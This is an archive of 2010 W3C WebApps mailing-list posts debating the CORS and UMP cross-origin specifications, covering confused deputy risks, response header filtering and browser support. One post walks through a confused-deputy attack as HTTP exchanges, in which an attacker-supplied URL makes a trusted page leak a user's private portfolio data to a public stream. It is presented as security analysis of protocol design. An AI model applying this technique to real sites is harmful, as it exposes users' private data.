Re: CORS ISSUE-108

2010-11-23 Thread Tyler Close
My recollection of the status of ISSUE-108 is that CORS was going to
provide functionality equivalent to that of UMP when the CORS
credentials flag is false. CORS was also going to expand its
Security Considerations section to explain the Confused Deputy issues,
possibly by borrowing text from UMP. Are you saying that this work has been
completed, or that it will not be undertaken? The current editor's draft of
CORS does mention a credentials flag, but I haven't found much detail
on it. For example, what effect does it have on use of the browser's
request cache?

--Tyler

On Wed, Nov 17, 2010 at 6:40 AM, Anne van Kesteren ann...@opera.com wrote:
 http://www.w3.org/2008/webapps/track/issues/108 has been open for a year and
 we have made little concrete progress on it unfortunately. Meanwhile, CORS
 is shipping, deployed and nobody is planning to take it out or down as far
 as I know. I think it is time to move on and go to Last Call.

 I am open to spending a few more days on finding a solution to this problem
 we can all agree with, but if we have nothing by December 1 and at that
 point it does not seem likely it will get anywhere we should go for a Last
 Call CfC (or maybe straight to a formal vote) and call it a day.


 --
 Anne van Kesteren
 http://annevankesteren.nl/





Re: Seeking agenda items for WebApps' Nov 1-2 f2f meeting

2010-09-13 Thread Tyler Close
On Sat, Sep 11, 2010 at 7:00 AM, Mark S. Miller erig...@google.com wrote:
 On Sat, Sep 11, 2010 at 5:43 AM, Arthur Barstow art.bars...@nokia.com
 wrote:

 * CORS, UMP - Anne will attend but what about MarkM and Tyler? Jeff,
 Thomas - are you planning some type of Web Application Security meeting/BoF?

 I will not be attending due to a schedule conflict.

I have the same schedule conflict.

--Tyler



Re: [cors] Unrestricted access

2010-07-14 Thread Tyler Close
On Tue, Jul 13, 2010 at 8:12 AM, Jonas Sicking jo...@sicking.cc wrote:
 On Tue, Jul 13, 2010 at 3:47 AM, Anne van Kesteren ann...@opera.com wrote:
 On Tue, 13 Jul 2010 12:35:02 +0200, Jaka Jančar j...@kubje.org wrote:

 What I'd like is a global (per-host) way to disable these limitations all
 at once, giving XHR unrestricted access to the host, just like native apps
 have it.

 It used to be a mostly global per-resource switch, but the security folks
 at Mozilla thought that was too dangerous and we decided to go with the
 granular approach they proposed. This happened during a meeting in the
 summer of 2008 at Microsoft. I do not believe anything has changed meanwhile
 so this will probably not happen.

 This does not match my recollection of our requirements. The most
 important requirement that we had was that it was possible to opt in
 on a very granular basis, and that it was possible to opt in without
 getting cookies. Also note that the latter wasn't possible before we
 requested it, and so this user's requirements would not have been
 fulfilled if it weren't for the changes we requested.

 Anyhow, if we want to reopen discussions about syntax for the various
 headers that CORS uses, for example to allow '*' as a value, then I'm OK
 with that. Though personally I'd prefer to just ship this thing, as
 it's a long time coming.

Unless IE is soon to indicate support for all of the extra CORS
headers, pre-flight requests and configuration caching, the decision
should be to drop these unsupported features from the specification
and come up with a solution that can achieve consensus among widely
deployed browsers. I thought that was the declared policy for HTML5.
As you know, I also think that is the right decision for many
technical and security reasons.

Jaka's request is reasonable and what the WG is offering in response
is unreasonable. I expect many other web application developers will
have needs similar to Jaka's. Meeting those needs with a simple
solution is technically feasible. The politics seem to be much more
difficult.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] Unrestricted access

2010-07-14 Thread Tyler Close
On Wed, Jul 14, 2010 at 12:02 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, Jul 14, 2010 at 10:39 AM, Tyler Close tyler.cl...@gmail.com wrote:
 On Tue, Jul 13, 2010 at 8:12 AM, Jonas Sicking jo...@sicking.cc wrote:
 On Tue, Jul 13, 2010 at 3:47 AM, Anne van Kesteren ann...@opera.com wrote:
 On Tue, 13 Jul 2010 12:35:02 +0200, Jaka Jančar j...@kubje.org wrote:

 What I'd like is a global (per-host) way to disable these limitations all
 at once, giving XHR unrestricted access to the host, just like native apps
 have it.

 It used to be a mostly global per-resource switch, but the security folks
 at Mozilla thought that was too dangerous and we decided to go with the
 granular approach they proposed. This happened during a meeting in the
 summer of 2008 at Microsoft. I do not believe anything has changed 
 meanwhile
 so this will probably not happen.

 This does not match my recollection of our requirements. The most
 important requirement that we had was that it was possible to opt in
 on a very granular basis, and that it was possible to opt in without
 getting cookies. Also note that the latter wasn't possible before we
 requested it, and so this user's requirements would not have been
 fulfilled if it weren't for the changes we requested.

 Anyhow if we want to reopen discussions about syntax for the various
 headers that cors uses, for example to allow '*' as value, then I'm ok
 with that. Though personally I'd prefer to just ship this thing as
 it's a long time coming.

 Unless IE is soon to indicate support for all of the extra CORS
 headers, pre-flight requests and configuration caching, the decision
 should be to drop these unsupported features from the specification
 and come up with a solution that can achieve consensus among widely
 deployed browsers. I thought that was the declared policy for HTML5.
 As you know, I also think that is the right decision for many
 technical and security reasons.

 Jaka's request is reasonable and what the WG is offering in response
 is unreasonable. I expect many other web application developers will
 have needs similar to Jaka's. Meeting those needs with a simple
 solution is technically feasible. The politics seem to be much more
 difficult.

 As far as I understand, UMP requires the exact same server script, no?

UMP Level One doesn't use pre-flight requests, so it doesn't have this
complexity, but it also doesn't enable arbitrary HTTP methods and
headers. Instead, the plan was to have UMP Level Two introduce a
well-known URL per host that could be consulted to turn on this
functionality for all resources. Level One and Level Two are split
since Level One is meant to cover only things that are currently
deployed.
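
Purely as an illustration (Level Two has not been drafted, so the URL
and the response format below are hypothetical, not from any spec),
the per-host opt-in might work along these lines:

GET http://example.org/uniform-policy HTTP/1.0

HTTP/1.0 200 OK
Content-Type: text/plain

methods: PUT, DELETE
request-headers: X-Custom

A user agent could fetch such a resource once and then allow the
listed methods and request headers on uniform requests to any resource
on that host, with no per-request pre-flight.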

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] Simplify CORS Headers (ISSUE-89)

2010-05-26 Thread Tyler Close
On Mon, May 24, 2010 at 8:23 AM, Adrian Bateman adria...@microsoft.com wrote:
 In IE, we only support Access-Control-Allow-Origin, and combining it with other
 values (albeit optional ones) that we don't support might be misleading. It
 also introduces some additional parsing that changes the behaviour from a 
 simple comparison to a more complex parse and then compare.

The above statement seems to imply that there are no plans for IE to
support the optional features of CORS such as pre-flight and user
credentials. Am I reading the statement correctly?

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: widget example of CORS and UMP

2010-05-14 Thread Tyler Close
On Fri, May 14, 2010 at 1:15 AM, Maciej Stachowiak m...@apple.com wrote:
 OK, so there's two vulnerability scenarios:

Actually, there is at least one other kind of vulnerability in the
CORS design that has not been mentioned by anyone yet and that does
not require XSS or untrusted code.

Before I describe the attack, I want to remind everyone that the
purpose of this particular scenario was to study the usability of CORS
and UMP in a benign situation. This example only has a page from Yahoo
talking to servers also operated by Yahoo. There are also no
side-effects in this example; it's purely a data presentation example.
Given that CORS and UMP are new protocols and that this is the most
benign scenario we can conjure, I think it's fair to expect a solution
with strong security properties. It should be damning if the solution
to this very simple scenario introduces complex security problems.

First I'll explain a concrete attack against the concrete example, and
then I'll generalize it to explain why we should expect this problem
to be recurring.

The CORS solution to the scenario creates a widely known URL,
"http://finance.yahoo.com/api/v1/my_portfolio", that is treated
specially when the request happens to come from the my.yahoo.com
origin. If you have tunnel vision on only the portfolio widget, then
you might see no problem, but there are also other pages with other
content on the my.yahoo.com domain. What happens if they make a
request to this same URL? Could something unexpected and wrong happen?
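
For concreteness, the portfolio widget's own fetch of that URL looks
roughly like this (headers trimmed; the cookie name and value are made
up for illustration):

GET http://finance.yahoo.com/api/v1/my_portfolio HTTP/1.0
Origin: my.yahoo.com
Cookie: session=8f2a90c1

HTTP/1.0 200 OK
Access-Control-Allow-Origin: my.yahoo.com
Content-Type: application/json

{ /* the logged-in user's private portfolio */ }

The permission rides on the requesting page's origin and the browser's
cookies, not on anything the page itself chose to send. Any other page
on my.yahoo.com that issues a GET to that URL gets the same treatment,
which is where the trouble starts.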

Let's say myYahoo also has a page that fetches the HotTrade of the
Day and posts its current price to my public activity
stream, letting my friends know what investment I'm researching at the
moment. The code for this content is audited by Yahoo and is not
malicious. The HotTrade of the Day can be on any market in the world
and for anything. It might be hog futures in China or rice in Chicago.
The page is used by momentum traders who just want to invest in
anything that's moving quickly. Since no site lists the price of
everything that can be traded, HotTrades returns the URL to GET the current
price. The page content was created by a trading firm that wants to
boost trades and attract new customers interested in trading on all of
the world's markets.

The page content makes the following requests:

GET http://hottrades.foo/hotnow HTTP/1.0
Origin: my.yahoo.com

HTTP/1.0 200 OK
Content-Type: text/plain

http://finance.yahoo.com/stock/goog/instaprice

and then:

GET http://finance.yahoo.com/stock/goog/instaprice HTTP/1.0
Origin: my.yahoo.com

HTTP/1.0 200 OK
Content-Type: text/plain

510.88

and then:

POST http://my.yahoo.com/stream/append HTTP/1.0
Origin: my.yahoo.com
Content-Type: text/plain

I got my tip at 510.88. Find your price at:
http://finance.yahoo.com/stock/goog/instaprice

HTTP/1.0 204 No Content

Later, an attacker causes an unexpected URL to get into the HotTrades
tip stream, resulting in the my.yahoo.com page doing the following:

GET http://hottrades.foo/hotnow HTTP/1.0
Origin: my.yahoo.com

HTTP/1.0 200 OK
Content-Type: text/plain

http://finance.yahoo.com/api/v1/portfolio/mine

and then:

GET http://finance.yahoo.com/api/v1/portfolio/mine HTTP/1.0
Origin: my.yahoo.com

HTTP/1.0 200 OK
Content-Type: application/json

{ /* all my portfolio data */ }

and then:

POST http://my.yahoo.com/stream/append HTTP/1.0
Origin: my.yahoo.com
Content-Type: text/plain

I got my tip at { /* all my portfolio data */ }. Find your price at:
http://finance.yahoo.com/api/v1/portfolio/mine

HTTP/1.0 204 No Content

If the Yahoo Finance portfolio was designed to use UMP instead of
CORS, this hack would not compromise any private
portfolio data since the attacker doesn't know the unguessable secret
for anyone's private portfolio.
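
In wire terms, the UMP portfolio fetch would look something like this
(the token in the URL is made up for illustration; note that there is
no Origin header and no cookie):

GET http://finance.yahoo.com/api/v1/portfolio/q7vw2xk93z HTTP/1.0

HTTP/1.0 200 OK
Content-Type: application/json

{ /* all my portfolio data */ }

Only content that was explicitly handed that unguessable URL can fetch
the private data; a URL planted by the attacker picks up no ambient
permission and so returns nothing the attacker could not have fetched
directly.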

The fundamental problem with the CORS design is that it attaches
ambient permission to a well-known URL, the portfolio URL, so code
that thinks it is just fetching public data might inadvertently fetch
private data and reveal it. Which URLs refer to private data versus
public data is unknowable to the web content. Any content that fetches
public data and then publishes a report on it could fall victim to
this kind of attack in a CORS world. For example, earlier Nathan was
interested in building a client-side web app that fetched Semantic Web
data from a variety of sources, computed on it and produced a result.
This app could very easily fall victim to this kind of Confused Deputy
attack in a CORS world. How is the app to know which URLs it accesses
have ambient permission attached to them that results in private data
being returned? In an UMP world, the app can fetch data without
attaching any credentials, and so knows that anything that comes back
must not be user-private data.

Considered only in isolation, the CORS solution might seem simple and
secure[1]. When you consider the effect this code has on the rest of
the origin and all the other code running on that origin, it is clearly
not secure. How is every 

Re: widget example of CORS and UMP

2010-05-14 Thread Tyler Close
On Fri, May 14, 2010 at 11:00 AM, Dirk Pranke dpra...@chromium.org wrote:
 On Fri, May 14, 2010 at 1:15 AM, Maciej Stachowiak m...@apple.com wrote:
 There are also more subtle risks to shared secrets. If you are creating your
 secrets with a bad random number generator, then they will not in fact be
 unguessable and you have a huge vulnerability. Even security experts can
 make this mistake; here is an example that impacted a huge number of people:
 http://www.debian.org/security/2008/dsa-1571.


 Sure.

Is someone claiming that the CORS cookie solution does not require use
of a random number generator? What's in the cookie and where did it
come from?

Access to a good random number generator is a requirement for either
solution and so is not relevant to this discussion.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: widget example of CORS and UMP

2010-05-14 Thread Tyler Close
On Fri, May 14, 2010 at 12:27 PM, Dirk Pranke dpra...@chromium.org wrote:
 On Fri, May 14, 2010 at 12:00 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Fri, May 14, 2010 at 11:27 AM, Dirk Pranke dpra...@chromium.org wrote:
 On Fri, May 14, 2010 at 10:18 AM, Tyler Close tyler.cl...@gmail.com wrote:
 On Fri, May 14, 2010 at 1:15 AM, Maciej Stachowiak m...@apple.com wrote:
 OK, so there's two vulnerability scenarios:

 Actually, there is at least one other kind of vulnerability in the
 CORS design that has not been mentioned by anyone yet and that does
 not require XSS or untrusted code.

 Before I describe the attack, I want to remind everyone that the
 purpose of this particular scenario was to study the usability of CORS
 and UMP in a benign situation. This example only has a page from Yahoo
 talking to servers also operated by Yahoo. There are also no
 side-effects in this example; it's purely a data presentation example.
 Given that CORS and UMP are new protocols and that this is the most
 benign scenario we can conjure, I think it's fair to expect a solution
 with strong security properties. It should be damning if the solution
 to this very simple scenario introduces complex security problems.


 We are talking about enabling a class of functionality (cross-origin
 messaging) that isn't currently possible on the web. Obviously if it is
 possible to do so securely and easily, that's a good thing. If that is not
 possible, and the options are to enable things that have relative degrees
 of security or ease of use, then it becomes much more debatable.
 Damning is a strong word to use in this situation,

 If the introduced security problems are complex and therefore hard or
 infeasible to solve, then damning is the right word. If the simple,
 benign scenario is made infeasible, that's damning.

  especially since I
 think most people would see from the interchange between Maciej and me that
 neither solution (CORS or UMP) makes things trivially securable. Another
 conclusion could be that doing this stuff is just hard.

 There's a big difference between trivially and infeasible. What are
 the issues with UMP where we cannot provide concrete guidance to
 developers? As I've shown, there are hard unknowns in the CORS
 solution.

 You've shown that there are cases where CORS is not secure. I don't know that
 I would agree with your assessment that you've shown that there are
 hard unknowns.

Further down in this email, you punt on my example, saying that it
can't be deployed. If there are classes of applications that CORS
cannot address, and these classes are important, then there are hard
unknowns in CORS. For example, will the Security Considerations
section of CORS have to say:

It is not safe in CORS to make a GET request for public data using a
URL obtained from a possibly malicious party. Validating the URL
requires global knowledge of all origins that might grant special
access to the requestor's origin, and so return private user data.

 As Maciej has shown, simply saying "make sure the URL can't be easily
 obtained" is not that easy.

I saw him assert that. I didn't see him show that. What are the
pitfalls that have not been addressed in the UMP spec?

 If the Yahoo Finance portfolio was designed to use UMP instead of
 CORS, this hack would not compromise any private
 portfolio data since the attacker doesn't know the unguessable secret
 for anyone's private portfolio.


 If the code had been audited, then it is reasonable to assume that someone
 would have caught that allowing the HotTrades service to tell the user to
 fetch *any url at all* was a bad idea, and the API should have been
 restricted to "GET http://finance.yahoo.com/stock/%s/instaprice" instead
 of "GET %s".

 You've changed the scenario so that now HotTrades can only happen on
 Yahoo listed securities, instead of those listed on any exchange in
 the world. You have to allow fetching of any URL to make the
 application work.

 If that is true, then a reasonable audit would not allow that app to run on
 my.yahoo.com, because of the dangers involved.

Or, a reasonable audit could say: that's a fine app, so long as
you're using UMP. If CORS requires the app to be rejected, that's a
failure for CORS and this WG.

I see the WG's role here as defining a protocol that enables
applications. Saying "don't do that", as has become popular of late on
this list, is failure.

 A possible CORS solution is to check that the URL
 does not refer back to a user private resource on my.yahoo.com and so
 do a check on the domain in the URL from HotTrades. However, now you
 have to wonder about other domains that accept cross-domain requests
 from my.yahoo.com, such as finance.yahoo.com. How do you list all
 other domains that might be giving special cross-domain access to
 my.yahoo.com? You can't; it's an unbounded list that is not even under
 the control of my.yahoo.com.

 This is also what Maciej said in his Don't Be a Deputy
 Slides - Guarantee that requests

Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Tue, May 11, 2010 at 5:15 PM, Ian Hickson i...@hixie.ch wrote:
 On Tue, 11 May 2010, Tyler Close wrote:

 CORS introduces subtle but severe Confused Deputy vulnerabilities

 I don't think everyone is convinced that this is the case.

AFAICT, there is consensus that CORS has Confused Deputy
vulnerabilities. I can pull up email quotes from almost everyone
involved in the conversation.

It is also not a question of opinion, but fact. CORS uses ambient
authority for access control in 3 party scenarios. CORS is therefore
vulnerable to Confused Deputy.

 It is certainly
 possible to mis-use CORS in insecure ways, but then it's also possible to
 mis-use UMP in insecure ways. As far as I can tell, confused deputy
 vulnerabilities only occur with CORS if you use it in inappropriate ways,
 such as sharing identifiers amongst different origins without properly
 validating that they aren't spoofing each other.

In the general case, including many common cases, doing this
validation is not feasible. The CORS specification should not be
allowed to proceed through standardization without providing
developers a robust solution to this problem.

CORS is a new protocol and the WG has been made aware of the security
issue before applications have become widely dependent upon it. The WG
cannot responsibly proceed with CORS as is.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 11:21 AM, Ojan Vafai o...@chromium.org wrote:
 On Wed, May 12, 2010 at 9:01 AM, Tyler Close tyler.cl...@gmail.com wrote:

 In the general case, including many common cases, doing this
 validation is not feasible. The CORS specification should not be
 allowed to proceed through standardization without providing
 developers a robust solution to this problem.

 CORS is a new protocol and the WG has been made aware of the security
 issue before applications have become widely dependent upon it. The WG
 cannot responsibly proceed with CORS as is.

 Clearly there is a fundamental philosophical difference here. The end result
 is pretty clear:
 1. Every implementor except Caja is implementing CORS and prefers a unified
 CORS/UMP spec.

IE does not currently implement the disputed sections of CORS. I don't
know what their plans are. Without IE support, the disputed sections
of CORS are not a viable option for developers.

Caja and similar technologies are unable to implement full CORS. It's
not just that they don't want to.

 2. Some implementors are unwilling to implement a separate UMP spec.

So CORS can normatively claim to implement UMP and use its algorithmic
spec to show how.

 The same arguments have been hashed out multiple times. The above is not
 going to change by talking through them again.
 Blocking the CORS spec on principle is meaningless at this point. Even if
 the spec were not officially standardized. It's shipping in browsers. It's
 not going to be taken back.

Again, the disputed sections of CORS are not yet widely deployed (no
IE) and so are not yet widely adopted by developers.

 Realistically, UMP's only hope of actually getting wide adoption is if it's
 part of the CORS spec. Can you focus on improving CORS so that it addresses
 your concerns as much as realistically possible?

UMP has had that effect on CORS and I'll continue to pursue this. I
also want to see the bad stuff removed.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 11:42 AM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, May 12, 2010 at 11:35 AM, Tyler Close tyler.cl...@gmail.com wrote:
 On Wed, May 12, 2010 at 11:21 AM, Ojan Vafai o...@chromium.org wrote:
 On Wed, May 12, 2010 at 9:01 AM, Tyler Close tyler.cl...@gmail.com wrote:

 In the general case, including many common cases, doing this
 validation is not feasible. The CORS specification should not be
 allowed to proceed through standardization without providing
 developers a robust solution to this problem.

 CORS is a new protocol and the WG has been made aware of the security
 issue before applications have become widely dependent upon it. The WG
 cannot responsibly proceed with CORS as is.

 Clearly there is a fundamental philosophical difference here. The end result
 is pretty clear:
 1. Every implementor except Caja is implementing CORS and prefers a unified
 CORS/UMP spec.

 IE does not currently implement the disputed sections of CORS. I don't
 know what their plans are. Without IE support, the disputed sections
 of CORS are not a viable option for developers.

 Really? As far as I know IE sends the Origin header which as I
 understood it was a major source of the confused deputy problem and a
 big reason for drafting the UMP spec?

Yes, IE does implement one disputed feature. I'm just pointing out
that much of the disputed text is not widely deployed, despite claims
to the contrary.

 Realistically, UMP's only hope of actually getting wide adoption is if it's
 part of the CORS spec. Can you focus on improving CORS so that it addresses
 your concerns as much as realistically possible?

 UMP has had that effect on CORS and I'll continue to pursue this. I
 also want to see the bad stuff removed.

 If so, I'd really like to see the chairs move forward with making the
 WG make some sort of formal decision on whether CORS should be
 published or not. Repeating the same discussion over and over is not
 a good use of your time or mine.

I certainly agree that this has consumed way more time than I would
like. I remain baffled that it's such a hard point to make. The
purpose of CORS is to enable 3 party scenarios. Use of ambient
authority in 3 party scenarios creates Confused Deputy
vulnerabilities. Even simple scenarios are vulnerable if one of the
parties is an attacker. I've shown how to use UMP instead for every
use case anyone has brought up. At this point, my only guess is that
I'm arguing against sunk cost.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CORS Header Filtering?

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 12:33 PM, Nathan nat...@webr3.org wrote:
 Yes,

 The simplest argument I can give is that we (server admins) are trusted to
 set the CORS headers, but not to remove any headers we don't want an XHR
 request to see - this is frankly ridiculous.

The problem is there might not be a single server admin but many.
Quoting from the UMP spec:


Some HTTP servers construct an HTTP response in multiple stages. In
such a deployment, an earlier stage might produce a uniform response
which is augmented with additional response headers by a later stage
that does not understand a uniform response header. This later stage
might add response headers with the expectation they will be protected
by the Same Origin Policy. The developer of the earlier stage might be
unable to update the program logic of the later stage. To accommodate
this deployment scenario, user-agents can filter out response headers
on behalf of the server before exposing a uniform response to the
requesting content.


http://dev.w3.org/2006/waf/UMP/#response-header-filtering

I believe the design presented in UMP for response header filtering
addresses all use-cases, including your Location header example
below.
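
For instance, a response that needs to expose an AtomPub-style
Location header could opt it in explicitly, using the Uniform-Headers
response header from that section of the UMP draft (the URL here is
illustrative):

HTTP/1.0 201 Created
Location: http://example.org/entries/42
Uniform-Headers: Location
Content-Type: application/atom+xml

The stage that understands uniform responses lists the headers it
wants exposed; headers added by a later stage that knows nothing about
uniform responses are filtered out by the user agent, as the quoted
text above describes.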

--Tyler

 CORS and same-origin rules have already closed off the web and made *true*
 client-side applications almost impossible; in addition, it's planned to
 remove headers which are vital for many applications to work, including many
 headers that are vital to the way the web works and are part of the HTTP spec
 for very good reasons.

 Can't happen, not good, no argument could ever change my opinion on this,
 and it definitely needs changed.

 http://tools.ietf.org/html/rfc5023#section-5.3

 AtomPub 5.3: Creating a Resource
 ..If the Member Resource was created successfully, the server
 responds with a status code of 201 and a *Location* header that
 contains the IRI of the newly created Entry Resource.

 You can't seriously block REST, the design of the web - this is ridiculous.

 Nathan

 Devdatta wrote:

 IIRC HTTP-WG has asked this WG to change this behavior from a
 whitelist to a blacklist. There was a huge discussion about this a
 while back -- maybe this could be an example of why CORS should follow
 the HTTP-WG's recommendations.

 -devdatta

 On 12 May 2010 11:50, Nathan nat...@webr3.org wrote:

 All,

 Serious concern this time, I've just noted that as per 6.1 Cross-Origin
 Request of the CORS spec, User Agents must strip all response headers
 other
 than:

 * Cache-Control
 * Content-Language
 * Content-Type
 * Expires
 * Last-Modified
 * Pragma

 This simply can't be; many other headers are needed.

 Link header is going to be heavily used (notably for Web Access Control!)

 Allow is needed when there's a 405 response (use GET instead of POST)

 Content-Location is needed to be able to show the user the real URI and
 provide it for subsequent requests and bookmarks

 Location is needed when a new resource has been created via POST (where a
 redirect wouldn't happen).

 Retry-After and Warning are needed for rather obvious reasons.

 There are non-RFC 2616 headers on which functionality is often dependent
 (DAV headers, for instance) - SPARQL Update also exposes functionality via
 the MS-Author-Via header.

 In short there are a whole host of reasons why many different headers are
 needed (including many not listed here).

 Nathan

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CORS Header Filtering?

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 1:05 PM, Nathan nat...@webr3.org wrote:
 Tyler Close wrote:

 On Wed, May 12, 2010 at 12:33 PM, Nathan nat...@webr3.org wrote:

 Yes,

 The simplest argument I can give is that we (server admins) are trusted
 to
 set the CORS headers, but not to remove any headers we don't want an XHR
 request to see - this is frankly ridiculous.

 The problem is there might not be a single server admin but many.
 Quoting from the UMP spec:

 
 Some HTTP servers construct an HTTP response in multiple stages. In
 such a deployment, an earlier stage might produce a uniform response
 which is augmented with additional response headers by a later stage
 that does not understand a uniform response header. This later stage
 might add response headers with the expectation they will be protected
 by the Same Origin Policy. The developer of the earlier stage might be
 unable to update the program logic of the later stage. To accommodate
 this deployment scenario, user-agents can filter out response headers
 on behalf of the server before exposing a uniform response to the
 requesting content.
 

 http://dev.w3.org/2006/waf/UMP/#response-header-filtering

 I believe the design presented in UMP for response header filtering
 addresses all use-cases, including your Location header example
 below.

 Yes, that pretty much covers it. Can you confirm whether Uniform-Headers would
 include the Link header as white-listed? That's the last remaining crucial
 one not covered. (The Link header is on the standards track now.)

The response would also have to include a Uniform-Headers: Link header.

 BTW: I will point out that I hadn't reviewed the UMP spec yet, so this
 isn't any political or preference thing.

 I still stand by my statement, though: CORS cannot possibly go through to REC
 status without the headers whitelisted in UMP + the Link header.

 Although my preference for both specs would be a blacklist...

We can't know the names of all the possibly dangerous headers. A
dynamic whitelist defined by the server is the best we can do.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 1:13 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, May 12, 2010 at 12:38 PM, Devdatta dev.akh...@gmail.com wrote:
 While most of the discussion in this thread is just repeats of
 previous discussions, I think Tyler makes a good (and new) point in
 that the current CORS draft still has no mention of the possible
 security problems that Tyler talks about. The current draft's security
 section

 http://dev.w3.org/2006/waf/access-control/#security

 is ridiculous considering the amount of discussion that has taken
 place on this issue on this mailing list.

 Before going to rec, I believe Anne needs to substantially improve
 this section - based on stuff from maybe Maciej's presentation - which
 I found really informative. He could also cite UMP as a possible
 option for those worried about security.

 I agree that the security section in CORS needs to be improved.

 As for the should CORS exist discussion, I'll bow out of those until
 we're starting to move towards officially adopting a WG decision one
 way or another, or genuinely new information is provided which would
 affect such a decision (for the record, I don't think I've seen any
 new information provided since last fall's TPAC).

A smart guy once told me that You can't tell people anything,
meaning they have to experience it for themselves before they really
get it. Has Mozilla tried to build anything non-trivial using CORS
where cookies + Origin are the access control mechanism? If so, I'll
do a security review of it and we'll see what we learn.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 4:45 PM, Adam Barth w...@adambarth.com wrote:
 On Wed, May 12, 2010 at 4:38 PM, Dirk Pranke dpra...@google.com wrote:
 On Wed, May 12, 2010 at 4:06 PM, Adam Barth w...@adambarth.com wrote:
 On Wed, May 12, 2010 at 3:16 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Wed, May 12, 2010 at 1:38 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, May 12, 2010 at 1:31 PM, Tyler Close tyler.cl...@gmail.com 
 wrote:
 On Wed, May 12, 2010 at 1:13 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, May 12, 2010 at 12:38 PM, Devdatta dev.akh...@gmail.com wrote:
 While most of the discussion in this thread is just repeats of
 previous discussions, I think Tyler makes a good (and new) point in
 that the current CORS draft still has no mention of the possible
 security problems that Tyler talks about. The current draft's security
 section

 http://dev.w3.org/2006/waf/access-control/#security

 is ridiculous considering the amount of discussion that has taken
 place on this issue on this mailing list.

 Before going to rec, I believe Anne needs to substantially improve
 this section - based on stuff from maybe Maciej's presentation - which
 I found really informative. He could also cite UMP as a possible
 option for those worried about security.

 I agree that the security section in CORS needs to be improved.

 As for the should CORS exist discussion, I'll bow out of those until
 we're starting to move towards officially adopting a WG decision one
 way or another, or genuinely new information is provided which would
 affect such a decision (for the record, I don't think I've seen any
 new information provided since last fall's TPAC).

 A smart guy once told me that You can't tell people anything,
 meaning they have to experience it for themselves before they really
 get it. Has Mozilla tried to build anything non-trivial using CORS
 where cookies + Origin are the access control mechanism? If so, I'll
 do a security review of it and we'll see what we learn.

 Not to my knowledge, no. I believe we use CORS for tinderboxpushlog
 [1], however since that is only dealing with public data I don't
 believe it uses cookies or Origin headers.

 Does anyone have something?

 At the risk of getting myself involved in this discussion again, you
 might consider doing a security analysis of Facebook Chat.  Although
 Facebook Chat uses postMessage, it uses both cookies and postMessage's
 origin property for authentication, so it might be a system of the
 kind you're interested in analyzing.


 I think (although I'm not certain) that Tyler is asking partially to
 figure out where a non-anonymous CORS request is used in the real
 world. If he isn't, then I am :)

 Given that a major (but not the only) claim of the need to adopt CORS
 with support for cookies and the Origin header is that it is in fact
 already implemented and shipping, it would be good to see how it's
 being used. If we can't find any examples of it being used (in the
 non-anonymous case, at least), then the argument against us having to
 keep it would hold less water. If we can find it being used, then we
 can see both how we would handle the case with UMP, and whether or not
 the CORS usage is in fact secure.

 Oh, I misunderstood.  I thought he wanted to do a security review to
 show that there was a confused deputy causing problems.

Both Adam and Dirk understood correctly. Ideally, I'd like an actual
CORS example to work on; otherwise I'd have to make analogies with
postMessage(), and I've already made a ton of analogies, apparently to
little effect. If people don't fully appreciate the relationship
between form-based CSRF and CORS-based Confused Deputy, then we need
an actual CORS application.

Out of curiosity, who are the 3 parties involved in the Facebook Chat
example? The little chat widget in the corner of the Facebook page
looks like a same-origin application.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: UMP / CORS: Implementor Interest

2010-05-12 Thread Tyler Close
On Wed, May 12, 2010 at 5:07 PM, Adam Barth w...@adambarth.com wrote:
 On Wed, May 12, 2010 at 4:56 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Wed, May 12, 2010 at 4:45 PM, Adam Barth w...@adambarth.com wrote:
 On Wed, May 12, 2010 at 4:38 PM, Dirk Pranke dpra...@google.com wrote:
 On Wed, May 12, 2010 at 4:06 PM, Adam Barth w...@adambarth.com wrote:
 On Wed, May 12, 2010 at 3:16 PM, Tyler Close tyler.cl...@gmail.com 
 wrote:
 On Wed, May 12, 2010 at 1:38 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Wed, May 12, 2010 at 1:31 PM, Tyler Close tyler.cl...@gmail.com 
 wrote:
 On Wed, May 12, 2010 at 1:13 PM, Jonas Sicking jo...@sicking.cc 
 wrote:
 On Wed, May 12, 2010 at 12:38 PM, Devdatta dev.akh...@gmail.com 
 wrote:
 While most of the discussion in this thread is just repeats of
 previous discussions, I think Tyler makes a good (and new) point in
 that the current CORS draft still has no mention of the possible
 security problems that Tyler talks about. The current draft's 
 security
 section

 http://dev.w3.org/2006/waf/access-control/#security

 is ridiculous considering the amount of discussion that has taken
 place on this issue on this mailing list.

 Before going to rec, I believe Anne needs to substantially improve
